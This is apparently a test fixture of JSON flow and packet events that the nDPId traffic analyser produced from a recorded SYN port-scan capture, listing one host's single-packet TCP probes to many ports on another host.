-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs7U0AACoGMSWsEAAIQA2GNIzTBDDdU4MZAAAAAGACDAAoXAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsSkwAACkG1SasEAAIQA2GNIzTJpTdU4MZAAAAAGACCAAJ+AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsBAUAAC4GFm6sEAAIQA2GNIzTGW7dU4MZAAAAAGACDAATHgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs3bMAADkGMb+sEAAIQA2GNIzTB+bdU4MZAAAAAGACCAAopgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsZGUAADgGrA2sEAAIQA2GNIzTCU\/dU4MZAAAAAGACBAArPQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsU4AAACcGzfKsEAAIQA2GNIzTE7vdU4MZAAAAAGACEAAU0QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsFDQAADcG\/T6sEAAIQA2GNIzTFR3dU4MZAAAAAGACEAATbwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAssJ8AAC4GadOsEAAIQA2GNIzTBI3dU4MZAAAAAGACDAAn\/wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAskycAADgGfUusEAAIQA2GNIzTH5LdU4MZAAAAAGACBAAU+gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsqRsAADMGbFesEAAIQA2GNIzTBBLdU4MZAAAAAGACEAAkegAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsY3EAADQGsQGsEAAIQA2GNIzTBBHdU4MZAAAAAGACBAAwewAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAstmwAADkGWQasEAAIQA2GNIzTJxPdU4MZAAAAAGACCAAJeQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAs4BMAACgGQF+sEAAIQA2GNIzTCp3dU4MZAAAAAGACBAAp7wAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsVvUAADIGv32sEAAIQA2GNIzTAmndU4MZAAAAAGACDAAqIwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsyjsAADEGTTesEAAIQA2GNIzTBHXdU4MZAAAAAGACCAAsFwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsKc0AACYG+KWsEAAIQA2GNIzTBDfdU4MZAAAAAGACDAAoVQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsHIEAADgG8\/GsEAAIQA2GNIzTgA7dU4MZAAAAAGACBAC0fQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsJwwAACUG\/GasEAAIQA2GNIzTFyLdU4MZAAAAAGACCAAZagAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAswSYAADIGVUysEAAIQA2GNIzTBD3dU4MZAAAAAGACDAAoTwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsuoMAADkGVO+sEAAIQA2GNIzTwAvdU4MZAAAAAGACCABwgAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsqtgAACcGdpqsEAAIQA2GNIzTL+ndU4MZAAAAAGACEAD4ogAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsnj0AACkGgTWsEAAIQA2GNIzTEB3dU4MZAAAAAGACCAAgbwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsjVUAACoGkR2sEAAIQA2GNIzTB8\/dU4MZAAAAAGACDAAkvQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsshUAADkGXV2sEAAIQA2GNIzTAG3dU4MZAAAAAGACCAAwHwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 